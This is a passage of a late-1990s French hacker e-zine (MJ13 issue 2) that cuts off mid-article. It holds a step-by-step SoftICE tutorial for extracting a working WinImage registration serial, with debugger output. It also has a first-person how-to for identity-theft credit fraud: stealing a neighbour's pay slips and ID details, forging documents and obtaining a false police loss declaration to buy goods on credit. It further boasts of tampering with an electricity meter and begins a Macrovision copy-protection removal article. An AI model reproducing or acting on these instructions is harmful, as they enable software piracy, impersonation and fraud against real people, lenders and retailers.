Copy Link
Add to Bookmark
Report
MJ13 Issue 2
1¾
MM MM JJJJJJJJJJJJJJ 11 33333333333
MMM MMM JJ 1111 33
MM MM MM MM JJ 11 11 33
MM MM MM MM JJ 11 11 33
MM MMMM MM JJ 11 33333
MM MM MM JJ 11 333
MM MM JJ 11 33
MM MM JJ JJ 11 33 33
MM MM JJJJJJ 11 333333333
ISSUE #2
I/ INTRODUCTION
2/ % DE PIRATAGE INFORMATIQUE [ALLIGATOR427]
3/ COURS DE CRACK 2 [SaMSoN]
4/ HACK DES SOCIETES DE CREDITS (THEME A) [ALLIGATOR427]
5/ BYE LA MACROVISION [MAD666]
6/ VOUS DEBUTEZ EN CRACK? QUE CHOISIR? DOS, WIN? [SaMSoN]
7/ INITIATION AU VIRUS [UnK MnemoniK]
8/ TROUVEZ DES WAREZ!!!! [Shybe]
9/ CDRWIN 3.0a, TRACAGE POUR REGISTRED [DONGLE KILLER, ALLIGATOR427]
10/ VIRUS, EXEMPLE! [UnK MnemoniK]
11/ VIRUS BATCH [DarK BirD (Special thank's)]
********************************************************************************
INTRODUCTION
nous avons creer cet e-mag pour diverses raisons, la principale
etant de mettre nos connaissances (informatiques & autres) en commun, sur
des sujets aussi divers que le Hacking, Phreaking, Virus, Crash, Anarchie,
Crack & Programmation de tous les types. On en oublie surement certains..
Ce mag se veut, se doit d'etre a tendance ultra liberaliste et +
les fautes d'orthografes y sont volontaires ;-)
On peut ecrire sur tout, de votre premier rapport avec un pc, aux hacks,
phreak etc en passant par votre premier rapport sex avec votre elephant!
on peut aussi construire des bombes, planter des fleurs, recreer la couche
d'ozone, piquer des larfeuilles...
on fait egalement ca pour envoyer un max de monde en prison! si!!!
------------------------------------------------------------------------------
MEMBRES: | Activit |
-----------------------------------------------------------------------------
ALLIGATOR427 / CREATEUR / REDACTION / CRACKER / COURRIER /
PhaNToM / CREATEUR / REDACTION / CRACKER / HACKER /
MAD666 / CREATEUR / REDACTION / HACKER / COURRIER /
SaMSoN / CREATEUR / REDACTION / CRACKER / DIFFUSION /
UnK MnemoniK / REDACTION / VIRUS /
JLB53 / REDACTION / CRACKER /
DONGLE KILLER / REDACTION / CRACKER / PROGRAMMATION PASCAL, DELPHI, ASM.
SHYBE / REDACTION / CRACKER / DIFFUSION / RECHERCHE FTP /
NECROMANCER / RECHERCHE WAREZ /
RANDALL FLAG / CRACKER /
BLURPY / RECHERCHE WAREZ /
Mister WIL / CRACKER / DIFFUSION /
SKELETOR / RECHERCHE WAREZ /
Un Welcome special a UnK MnemoniK, de la part de tous.
Special Thank's a DaRK BiRD, pour sa participation & article.
_____________________________________________________________________________
SITE:
www.mygale.org/08/samson/
www.mygale.org/01/mister/
www.mnet.fr/maraga
www.toptown.com/HP/mj13
COURRIER:
alli427@hotmail.com
-----------------------------------------------------------------------------
MJ13 ne saurait etre tenu responsable de l'irresponsabilit de ces auteurs
par leurs articles ecris, verifis ou pas, et des problemes qui pourrait
s'en suivre pour vous, lecteurs.
nous ne serions etre tenus responsables des causes de la lecture & mise
en application des articles ci dessous. Vous savez tous quel procedure
employ pour voler dans un supermarch, et vous ne le faites pas pour
autant! il est evident que ces articles ont t ecris dans un but d'etude,
evitez de prendre ca comme un aller direct a la prison de votre departement.
a priori, nous acceptons tout articles traitant de h/p/c/c/a/v, et meme les
autres. en aucun cas des articles de themes d'ethique racial ne saurait etre
tolrs et admis. si vous voulez casser du noir, ecrivez a Le Pen et pas a
nous. toutes personnes faisant partie de notre groupe se doit d'ecrire des
articles signes, et de ne divulguer son identit a quiconque,
pour quelques raisons que ce soit. L'identit des personnes participant
a cet e-mag doit rester confidentiel, afin de s'auto proteger, et de rester
.../ Virtuels?\...
Vous ne faites pas partie du groupe et souhaitez nous envoyer des articles,
nous poser des questions, nous critiquer?
ALLEZ-Y!!! vos articles seront lus, soumis a divers menbres & diffuss si
jugs intressant... vos courriers seront traits avec SOINS, et nous vous
repondrons soit par mail, soit par diffusion dans notre rubrique questions/
reponses.
Vous pouvez egalement vous enregistrer pour recevoir l'issue #3 des sa sortie
a l'adresse courrier MJ13: alli427@hotmail.com
MJ13 est un magazine de libre diffusion, a but non lucratif, et donc gratuit.
Nous vous invitons a le diffuser au maximum. Bonne lecture.
------------------------------------------------------------------------------
WANTED: Articles programmation, cours C, C++, PASCAL..., articles a themes A..
------------------------------------------------------------------------------
Voici donc l'issue 2.0, qui n'etait plus attendu!!!!
ALLIGATOR427 & MAD666
********************************************************************************
| % DE PIRATAGE INFORMATIQUE |
| PAR |
| ALLIGATOR427 |
********************************************************************************
ALLIGATOR 427 au cerveau de jade et d'argent. je mouche mon nez, r'monte
mes chaussettes, je vous attends.
*********************************H.F.T******************************************
Juste histoire de voir comment notre cher pays est plac par rapport au
piratage logiciels informatique...
PAYS Pourcentage de Piratage:
--------------------------------------------------------
Allemagne 71%
Australie 45%
Belgique 66%
Espagne 87%
Etats Unis 39%
France 83% (c'est pas mal du tout nan?)
Italie 86%
Japon 96%
Singapour 43%
Suisse 60%
Taiwan 93%
Thailande 99%
Pole sud: 0%
Source: Business Software Alliance, Bass sur un rapport de
Novembre 1996
ALLIGATOR427 / MJ13
********************************************************************************
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Initiation au crack, cours 2 ³
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ par ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ ÀÄÄÄÄÄÄÄSaMSoNÄ[Mj13/Dsk]ÄÄÄÄÄÄÙ ³
³ ³
³ "Messieurs les mecs des ministres ³
³ En meme temps que vos impots ³
³ Vous pouvez faire monter vos bieres ³
³ Y'en a marre !" ³
³ Leo Ferre ³
³ ³
³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³
³ ³ 1. Introduction ³ ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ 2. Des Breakpoints... ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
³ 3. Winimage 2.20: le serial ³
³ 4. Les Credits de Mr. SaMSoN ³
³ 5. Contactez moi! ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ 1. Introduction ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Dans le premier cours, nous avons fait une approche de Winice, en presen-
tant rapidement les fonctions de bases. Nous avons egalement fait un crack
simple de la boite de dialogue a l'entree de Winimage 2.50, en detaillant la
marche a suivre de A a Z. Je vous avait promis de vous montrer comment trou-
ver le serial qui correspond a votre nom... Malheureusement, j'ai pomme la
version 2.50 (saint bordel de mon disque dur :)... Je vais donc faire cette
lecon avec la version 2.20, largement repandue dans les CD-Rom (ou cederom:)
fournis avec les revues... Malgre tout, le programme, en ce qui concerne
la procedure d'enregistrement, est le meme pour les versions 2.20, 2.50 et
3.0 de Winimage. Seuls les offsets changent. Ainsi, le serial realis avec
Winimage 2.20 fonctionnera avec les versions ulterieures...
Avant d'attaquer le serial de Winimage, je vous ferai d'abord une presen-
tation generale du principe des breakoints sous Windows.
NB: Vous pouvez egalement consulter des tutoriaux en Anglish, le plus se-
rieux etant a mon sens celui de +ORC (cherchez "Fravia" avec un moteur de
recherche sur le Web)
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ 2. Des Breakpoints... ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Pour pouvoir debugger des softs sous Windows, les Breakpoints sont essen-
tiels. Il s'agit de "points d'arrets" dans le deroulement d'un programme. En
effet, si vous lancez Winimage (ou tout autre soft Windaube) et que vous u-
tilisez le Breakpoint de base Ctrl-D, Winice apparait mais vous n'etes cer-
tainement pas dans le code source de Winimage, mais quelque par dans les
procedures de Windows: l'inconvenient du multitache...
On peut (et doit) donc poser des Breakpoints (BP) sur un offset precis du
code source (BPX xxxx:xxxxxxxx ou bien F9 apres avoir mis le curseur sur
l'offset vise) ou bien encore sur des procedures de Win95. En effet, les
softs programms pour Windows utilisent de nombreuses fonctions proposees
par Windows. Ainsi on peut poser des BP sur les boites de dialogues (BPX
DIALOGBOXPARAM) ou bien sr les "messagebox" (BPX MESSAGEBOX) mais sur
bien d'autres fonctions (BPX CREATEMENUITEM......) Il m'est impossible de les
citer tous, a vous (et a moi) d'en decouvrir d'autres jours apres jours...
On peut egalement en poser sur un offset memoire (BPMB xxxx:xxxxxxx) ou
sur des interruptions (BPINT) ou sur ce qui sort par le port paralelle (BPIO)
Vous le comprenez aisement, trouver le BP efficace n'est pas toujours
chose facile.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ 3. Winimage 2.20: le serial ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
On lance donc Winimage, et la boite de dialogue d'enregistrement (opti-
ons-|'enregistrement). On entre un nom et un serial bidon (pour moi: "Samson
[Mj13] et 12121212 comme serial).
La, on va utiliser un BP assez complexe. Il s'agit en effet d'arreter le
soft apres avoir valide le nom et le serial avec OK mais avant d'avoir le
message qui nous indique que le serial entre est incorrect.
On fait donc "surgir" (attention, c'est violent :) Winice avec Ctrl-D...
La, on va chercher le nom de la "task" pour Winimage. Il s'agit du nom uti-
lise par Windows95 pour le deroulement de Winimage. On entre donc l'instruc-
tion "task":
TaskNameÄÄÄSS:PPÄÄÄÄÄÄStackTopÄÄStackBotÄÄStackLowÄTaskDBÄÄhQueueÄÄEvents
Winimant 0000:0000 0066D000 00670000 1BBE 0A8F 0000
Winshade 0000:0000 0066E000 00670000 190E 2817 0000
Impwm 0000:0000 0069D000 006A0000 1A56 19CF 0000
Explorer 0000:0000 0066C000 00640000 1B86 1B37 0000
Any Key To Continue, Esc To Cancel
On voit donc les differents taches qui tournent sur mon systeme. Celle qui
nous interesse, c'est "Winimant". On note simplement le nom.
On execute maintenant l'instruction "Hwnd Winimant", pour avoir le detail
des boites de dialogues "en route" avec Winimage:
WindowÄHandleÄÄÄHQueueÄÄSZÄÄQOwnerÄÄÄÄClass NameÄÄÄÄÄÄÄÄÄWindow-Procedure
02B8(1) 0A8F 32 WINIMANT #32770 (Dialog) 078F:00004757
02BC(2) 0A8F 32 WINIMANT Static 078F:000052FA
02C0(2) 0A8F 32 WINIMANT Edit 079F:00000BF4
02C4(2) 0A8F 32 WINIMANT Static 078F:000052FA
02C8(2) 0A8F 32 WINIMANT Edit 078F:00000BF4
Any Key To Continue, Esc To Cancel
Cette instruction nous montre donc la composition de la boite de dialogue
selectionnee:
- la "fenetre maitresse" dont le Window Handle est suivi de (1) et ses
composants, suivis de (2).
- Le class name "Static" designe tout ce qui peut etre ecrit
("Nom:";"Serial:")
- le class name "Edit" designe les zones de saisie, "Static" qui designe
les zones de texte non-editables, etc...
On note le Window Handle de l'une de ces zone de saisie, 02C0 par exemple.
On a enfin tous les elements pour poser un BP correct:
"BMSG 02C0 WM_Gettext"
On relance donc le deroulement de Winice avec la touche F5, et l'on valide
le nom et le serial entres en cliquant sur "OK". Rapidement, Winice apparait
on va enfin pouvoir commencer a tracer dans Winimage.
La, il faut faire du "trace over" avec la touche F10, comme un tar, jus-
qu'a ce que la boite de dialogue nous indiquant "Donnees incorrectes" appa-
raisse. Quant celle-ci est validee, on a le code suivant sous les yeux:
xxxx:0040A500 CALL 0040D335 <ÄÄÄ Test du serial
xxxx:0040A505 ADD ESP,08
xxxx:0040A508 XOR ECX,ECX
xxxx:0040A50A MOV [00421024],EAX
xxxx:0040A50F TEST EAX,EAX <ÄÄÄ Si EAX different de 0
xxxx:0040A511 JNZ 0040A53F ÄÄÄÄÄÄ¿ Alors Code Faux
xxxx:0040A513 MOV EAX,00000001 ³ Sinon Bon
xxxx:0040A518 PUSH 00002000 ³
xxxx:0040A51D PUSH 0000042D ³
xxxx:0040A522 MOV [00420C30] ³
xxxx:0040A527 PUSH 0000042B ³
xxxx:0040A52C MOV [00420B8C],EAX ³
xxxx:0040A531 MOV [00420B78],CL ³
xxxx:0040A537 MOV [00420E28],CL ³
xxxx:0040A53D JMP 0040A55A ³ Saut vers: "Code bon"
xxxx:0040A53F XOR EAX,EAX <ÄÄÄÄÄÙ Debut de la procedure "Faux serial"
xxxx:0040A541 PUSH 00002000
xxxx:0040A546 PUSH 0000042D
xxxx:0040A54B MOV [00420C30],EAX
xxxx:0040A550 PUSH 0000042A
xxxx:0040A555 MOV [00420B8C],EAX
xxxx:0040A55A PUSH ESI
xxxx:0040A55B CALL 0040EB84 <ÄÄÄ Execute la boite "Donnees incorrectes"
xxxx:0040A560 ADD ESP,10
xxxx:0040A563 PUSH 00
En traant comme un fou, on arrive sur le Call de l'offset 0040A55B. Quand
on l'execute, la boite de dialogue "Donnees incorrectes" apparait. Il faut
maintenant essayer d'analyser le code alentour.
- On repere a l'offset 0040A53D un JMP inconditionnel. La procedure "Faux
serial" commence donc a l'offset d'apres: 0040A53F.
- On cherche donc un saut conditionnel qui renvoie vers cet offset.
- On le repere pas tres loin:
xxxx:0040A511 JNZ 0040A53F
- Peu avant ce JNZ, on repere un
xxxx:0040A500 CALL 0040D335;
Il y a 95% de chances pour que ce soit ce CALL qui verifie si le serial
est bon. On pose donc un BP sur ce call. Deux solutions pour ca:
- placer le curseur sur l'offset vise et appuyer sur F9.
(Je rappelle que la touche F6 permet de passer de la zone "Edit" de
Winice a la zone "Code")
- faire un "BPX 0040A500"
Les deux ont un resultat equivalent.
On remet Winimage en marche avec Winice (F5).
On relance la boite de dialogue d'enregistrement. Comme tout a l'heure,
on rentre des donnees bidons qu'on valide avec OK. La,Winice apparait a cau-
se du BP place plus haut. On n'en a plus rien a foutre.
[Petite paranthese: la commande BL vous donne la liste des Breakpoints.
Vous pouvez en effacer (BL) en desactiver (bd xx) puis les reactiver
(be xx)].
On continue avec F5, jusqu'a ce que Winice s'arrete sur l'offset 0040A500.
On "rentre" dans le CALL avec F8.
La, on entre vraiment dans la phase de recherche du serial... Je ne vais
pas m'amuser a vous retranscrire toute la procedure. Je vais donc vous si-
gnaler les offset interessants.
Au fur et a mesure que l'on trace on essaye d'abord de reperer les ins-
truction du type "PUSH WORD PTR [EBP+08]" et "LEA ECX,[EBP-14]" (bien enten-
du, les valeurs ne sont citees qu'a titre d'exemple).
Au debut de la procedure, on a l'instruction suivante:
xxxx:0040D34B PUSH DWORD PTR [EBP+08]
En haut de l'ecran Winice m'indique (ce sera different pour vous):
SS:0066F664=00420E28
Donc, je fais un "D 00420E28" pour afficher le contenu de cet offset.
Et winice m'affiche "Samson [Mj13]" le nom entre pour l'enregistrement.
xxxx:0040D358 LEA ECX,[EBP-14]
Je fais un "D EBP-14" cd qui nous donne le serial bidon
xxxx:0040D35B LEA EAX,[EBP-28]
Un "D EDP-28" ne nous donne pas grand chose. Mais, on a deja eu le nom,
le serial bidon. Tout porte a croire que le bon serial sera "case" dans
cet offset. On garde donc un oeil dessus.
xxxx:0040D361 CALL 0040D2E7
Apres avoir execute ce CALL, l'offset [EBP-28] se modifie et nous donne
"2D3A0D60". Cela ressemble a un serial. Mais nous ne somme qu'au debut
de la procedure et il ne s'agit probablement que d'une etape interme-
diaire.
xxxx:0040D395 CALL 0041B8D8
Nouvelle modification de [EBP-28]: "413F26AB"
xxxx:0040D3B7 CALL 0040D2E7
Nouvelle modification de [EBP-28]: "44402684"
xxxx:0040D3E0 CALL 0040D2E7
Nouvelle modification de [EBP-28]: "3D3F26E1"
Nous n'avons, ensuite pas d'autres modifications de cet offset...
On relance donc la procedure d'enregistrement avec exactement le meme nom
que precedemment et ce que l'on pense etre le serial (pour moi:3D3F26E1)
Et... Ca marche!
Donc, pour moi:
Nom: Samson [Mj13]
Serial: 3D3F26E1
Bon, c'est pas forcement evident a expliquer, alors je ne sais pas si j'ai
toujours ete clair. Mais, en vous accrochant, ca devrait passer. Quand vous
aurez fait ce crack, essayez-vous sur le serial de Winzip, la procedure est
assez semblable.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ 4. Les credits de Mr Samson ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Un grand salut a:
Dsk (Snem, Spanik, Dark Angel...), contactez nous: www.mygale.org/11/snem
F-Kaos (Cassio-P, Crifalo), Piracy.Fr
Tous ceussent qui trainent sur #Warez-France:
Ofx, Loginz, Mht, Capitaine, Godfroy, Hocus, Betty3D, etc...
Unknown Mnemonic (bienvenue chez nous) [NDLR:voir son article sur les virus.]
Vous qui trainez dans la salle d'info de la fac :)
ET BIEN SUR LES MEMBRES DE MJ13
-= Et a tous ceux qui font bouger la scene francophone!!! =-
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ 5. Contactez moi! ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
E-mail: samsondsk@hotmail.com (plus d'e-mail massons@xiii.univ-angers.fr :)
Ma page Web pour trouver mes cracks, des outils,le dernier Mj13...
http://www.mygale.org/08/samson/
Sur Irc: Channel #Warez-France ou #Warez_France
Nick: Samson ou {Samson}
Je recherche egalement des pages Web qui luttent contre le fascisme en
France pour une prochaine section de ma page et bien sur, si vous avez une
page Web "underground" francophone, n'hesitez pas!
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ Samson [Mj13/Dsk] ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
*******************************************************************************
| HACK DES SOCIETES DE |
| CREDITS |
| PAR |
| ALLIGATOR427 |
*******************************************************************************
ALLIGATOR 427, au long regard phosphorecent, aux ailes de cachemire safran,
je grille ma derniere cigarette, je vous attends...
Je sais que desormais vivre est un calembour, la Mort est devenu un etat
permanent, le monde est un Phantom, aux hyenes &.. aux vautours...
*******************************H.F.T*******************************************
Ca y est... J'ai recul mon compteur. E.D.F est venu relev les nouveaux
numros, et ils ont plong!!! Fabuleux! Me voici avec une facture de 800 balles
pour 6 mois. Correct! Ca s'arrose. 2721eme cuite... Ca aussi ca s'arrose...
Un double arrosage! Putain de cuite, ca remonte! il est 20h et j'suis deja
bourr. Faut que j'reste debout, j'ai un rencard avec la voisine du troisieme
a 22h. Dans l'attente, j'vais cracker un p'tit logiciel, voir si les cours de
SaMSoN sont bien clair, ou s'ils sont comme moi. C'est a ce moment precis
que le drame se produisit! Je m'eclate la tronche sur mon PC! Haaaa...
l'ecran fume, ho, pute de vierge! l'unit centrale aussi. j'suis dans la
merde, tout est cram. Il m'faudrait un nouveau pc! et ce rapidos!
Reflechissons: Une fois payer ma facture EDF, mes clopes, la bouffe pour
le mois, il me restera entre 400 et 430 balles! genial! Aucun doute, c'est
pas avec ca que j'vais m'payer une becane! Quand au credit, en suplement
d'etre au chomdu depuis 7 ans (et pourtant je cherche), on a meme pas payer
la tel! On a trouv un compromis et j'leur file 100balles par mois, mais
jamais il ne m'en accorderont un autre... Putain, si j'avais pus changer
d'identit quelque heures. Mais ca..
Quoi-que... Une ide enflame vient de me rentrer dans la tete, etre un autre
que moi... ouais. Mais qui? vaut mieux que j'prenne une personne que j'connais
mais qui risque pas de faire le raprochement avec moi. QUI??? vite, une biere,
ca m'aidera a penser, puis tt facons j'ai decuit.. Tiens, j'vais m'calmer..
3 valium! au diable l'avarice...
20h40: tjrs pas de cible..
20h50: mon rencard approche.. son mec part boss a 22h00, ma femme se pieute
a 21h00, tu parles, on s'eclate!
son mec, tu parles d'1 con! Agent de securit qu'il est.. il s'l'a joue rambo
tandis que j'm'envoie sa femme..., la j'rigole!!
21h10: son mec... il m'connait a peine. bonjour dans l'escalier, par contre,
moi j'connais tout sur lui. Voila une cible potentiel!
21h30:je dresse une strategie: Je reste chez la gonzesse, et quand elle dort
je fouine. faut trouver une piece d'identit a lui, un bulletin de salaire,
une quittance de loyer ou EDF, un RIB et ca devrait coller.
21h45:1 autre biere..
22h00: un oeil par la fenetre, sa bagnole est plus la.. Je monte.
salut beaut, seul?
elle se jette sur moi et... j'vous passe les details, non mais!
22h33, l'affaire est boucl, fallait qu'ca speed, et j'ai autre chose a penser
elle dort pas encore! bon, ben, j'vais l'interroger comme si de rien etais.
Tu t'en sors financierement? t'as des credits? et ton mec, il en a? il t'aide?
juste un pour la bagnole, juste 1 credit.. endorts toi.. j'vais pas lui
chanter une berceuse qd meme!
23h30: ca y est!! si!! elle pionce! allez go, au boulot.
j'me leve en douceur, et hop, dans la cuisine. au mur un truc en pendant avec
inscrit "PAYER" et "A PAYER". ca simplifie la tache ca.. dans les payer:
une facture de telephone, la redevance tel, EDF!!! ha! elle a et pay y'a
un mois. zzou, dans la poche, j'la r'mettrais d'main! Y'a aussi un relev
de compte qui fera office de RIB, j'aurais pus l'piquer au courrier m'enfin
j'suis press (de finir ce putain d'article!)
direction la salle, j'ouvre un premier placard, rien.. un second et hop,
dans une pochette rouge, les bulletins de salaire! et hop, le dernier, et
pendant que j'y suis j'vais meme prendre les 3 derniers + un bulletin dans
les premiers. des photocop et ca ira.. (j'tiens a preciser qu'on peut faire
des bulletins de salaire soi meme, en reprenant les cotis. sociales, que
l'URSAFF se fera un plaisir de vous donner, prenez aussi le num de SIRET
pour refaire un tampon en vitesse... les dates, des fois ou on telephonerais
a la boite, on est jamais assez prevoyant)
Maintenant, une piece d'identit...
dans le couloir, au porte manteau, y'a 2 blousons a lui..
Allez, j lui fais les poches! Paf, ca n'aurait su rater, pas de permis de
conduire mais une piece d'identit. Crayon, papier et j'note:
nom, prenom, date de naissance, nøde la piece...
celle la, j'peus la remettre.. j'ai tout ce qui me faut.
0h50: je redescends me coucher...
9h10: reveil.. les gosses a l'ecole, la femme j'sais pas ou.. pour moi c'est
une bonne journe qui commence.
une biere! Hey, c'est la premiere! pas de commentaires!
une douche, un coup de rasoir, des fringues propres et il est deja 10h30.
bus pour me rendre a une boutique ou l'on fait des photocopies seul.
1f60 et voila mes bulletins de salaires, en meilleurs etats que les originaux.
j'vais les chiffoner un poil. voila, maintenant elle sont plus ressemblante!.
il est midi.. j'vais boire l'apero.
15h00: sortis du bar.
15h10: direction le commisseriat central de ma p'tite ville: TOULON
j'entre..
-monsieur? m'interpelle t'on.
-oui, excusez moi mais j'ai un petit probleme, j'ai perdu mon portefeuille, et
je me trouve sans piece d'identit ni permis, c'est ennuyeux.
-Nous allons vous faire remplir une declaration de perte, ca fera office de
piece d'identit ou permis pour 2 mois.
-ha, ouf, vous ne pouvez imaginez combien vous me rendez service.
-mais nous sommes la pour ca.. (menteur qu'ils sont!)
je remplis donc cette declaration de perte, il va sans dire que j'ai appris
par coeur le nom, prenom & date de naissance de mon cher voisin.
arrive le moment ou on demande le numero des pieces...
alors la, je sors mon papier ou c'est not et j'inscris..
(ca marche aussi sans le numero!)
je lui remets tout ca, lui demande de me la tamponner, en cas ou on prendrais
ce papier pour un faux(je demande pour faire lm'ignorant! il tamponne
toujours!). il le fait, et, adieu & merci! sisi, ca se passe comme ca!
me voila donc avec tous les papiers necessaires au credit.
j'commence a etre press vu l'heure, et il me faut un magasin style supermarche
ou grosse surface avec meubles et tout.. un petit magasin se rapellerait trop
facilement de mon visage. je choisis conforama, et m'y rends en taxi.
voila l'utilisation ingenieuse de mes 400balles de fin de mois..
j'y entre. mon coeur cogne.. et si ca foire??? qui ne tente rien n'a rien
et j'y tiens a prendre un nouveau pc. rayon informatique. la j'y connais plus
rien en informatique, j'laisse un vendeur me faire son baratin.. faut surtout
pas que je prenne la plus grosse becane, avec scanner, imprimante etc..
j'vais meme prendre la promo a 9 990f. je reste un peu sceptique au baratin
du vendeur, mais il croit me trainer dans la farine et hop! l'affaire se
conclut. arrive enfin le mode de paiement. je sors: a credit...
et la il me cite: 1 piece d'identit, 1 rib, vos 3 derniers bulletins de sal-
aires, et une quittance loyer, facture telecom, edf...
j'ai tout dans ma poche, j'lui sors avec la declaration de perte...
la il regarde ca.. et moi j'lui explique que j'ai perdu mes papiers et que
je sors du commissairiat etc, etc..
il a pas envie de perdre son pourcentage, donc il accepte le tout..
quand il me demande combien d'apport cash je fais, je prends un air surpris,
et lui dis tres gentiment que je pensais qu'il n'y avait rien a payer au depart
(vous pouvez aussi lui filez 500f, ca passe mieux).. il pose tout un tas de
question, montant de loyer, nombre d'enfant a charge etc... j'connais l'voisin,
le loyer? j'le descends de 500 balles, enfant? y'en a pas! etc...
10mn sur minitel et voila..
il vous dis que c'est bon.. normalement...
je rentre, allume mon nouveau pc,oublie la voisine, ma femme et me fais arreter
6 mois plus tard, au cours de mon arrestation,ca se passe mal, et j'tue 1 flic
avec un ecumeur, j'suis jetter dans une cave avec des grilles sur une fenetre
en aglomar, et c'est de la que j'vous raconte ca... plus que 20 ans a tirer,
a defaut de la voisine...
Bon, j'ai abrg, mais l'ide de base y est, et sachez que ca marche, j'espere.
j'avais le choix entre ca, ou des cours d'asm! mais sans pc, pas de possibilit
de cours!!! alors... J'ai abreg disais-je, lisez entre les lignes...
cherchez pas une voisine au troisieme... j'ai voulu par cet article, trouvez
et expliquez une faille de plus de notre systeme. Bien que, je me repte,
la technique de base est bonne et fonctionne, je l'ai deja vu faire,
je ne me tiens en aucun cas responsable de vos actes et test.
Quand a moi, je n'habite pas TOULON, et n'ai pas de voisine au troisieme.
Je remercie le commissairiat de TOULON ainsi que les magasins CONFORAMA
pour leur aimable collaboration!!
PS: Si je mourrais enferm suite a cet article, je ne veux en aucun cas etre
mis en biere.. non.. Quand le pinnochio baveux poussera ma brouette a Lancoux
j'veux qu'on m'degaze au gin/Sinthol, dans une piole de Jonnhy Walker, a la
Vodka d' chez warold; avec du Tomato campell!!! J'veux qu'on m'serve un apero,
si possible un double zero, afin de rencontrer Blanche Neige, et de fumer
un des sept nains!.. je compte sur vous..
Je recherche a peter tous sites pedophiles! Fuck a tous les pedophiles!!!
pour me contacter: ecrire au courrier...
ALLIGATOR427 / MJ13
ALLIGATOR 427, au souffle d'or et de diamant, je sais que vous etes
fin pret, je vous attends. Je sais que tu as la beaut destructive et
le sourire vaincu comme un dernier soupir, tu sais que nos enfants s'appeleront
Vers de terre... 'hft'
A ma Femme.
Je sais que vos machoires distille... l'agonie, a chaque parole!...'hft'
A Vous tous...
********************************************************************************
*******************************************************************************
MACROVISION ,ou comment "cracker" les cassettes videos. Par MAD666
*******************************************************************************
Fichiers additionnels:MVISION1.GIF: implantation des composants.
MVISION2.GIF: Shma circuit imprim double-faces (200dpi)
Voil
enfin ce sujet tant attendu par certains membres du groupe.
Historique: Depuis une 10ne d'annes,les fabriquants/dupliqueurs de cassettes
ont ts confronts
un problme:Le Piratage. Aprs de nombreuses tudes par
des ingnieurs/lectroniciens,ils trouvairent un moyen de protection contre ce
piratage,ce qui,
priori,et a forciori aussi ;-),parraissait materiellement
impossible
faire au depart sans lectronique spcialis dans les
magnetoscopes. Il fut mis au point differents systemes,chacun propres
chaque
fabriquants/dupliqueurs. Il se posa alors un probleme:Chaque magnetoscope
n'etant pas adapt spcifiquement
chaque systemes,cela rendait tout simplem-
-ent illisible certaines cassettes sur certains modles de magntoscope !!!
Vers 1995,il fut dcid d'un systeme unique de protection pour tout les
fabriquants/dupliqueurs,et ce,en collaboration avec les fabriquants de scopes
afin de rendre la protection totalement transparente pour l'utilisateur,et
pour quelle soit le plus fiable possible.
Procd: La macrovision est un pocd relativement simple qui joue entre la
synchronisation des 2 scopes relier entre eux. En rsumant rapidement :
On insre des lignes de synchro avant le signal image,ce qui a pour efait,
lors d'une copie,de ne pas copier ces lignes convenablement sur le scope de
destination,et donc,de rendre la copie quasi illisible (sottement de l'image,
spot lumiere ...) En jouant sur la synchro verticale d'un moniteur,on peux
visualiser ces lignes indsirables en baissant l'image vers le bas.il
apparrait alors,en haut,des lignes de synchro qui ne devrait plus etre l
si on veux pouvoir copier les cassettes ...
Remde: Un petit circuit electronique
inserer entre l'entre et la sortie
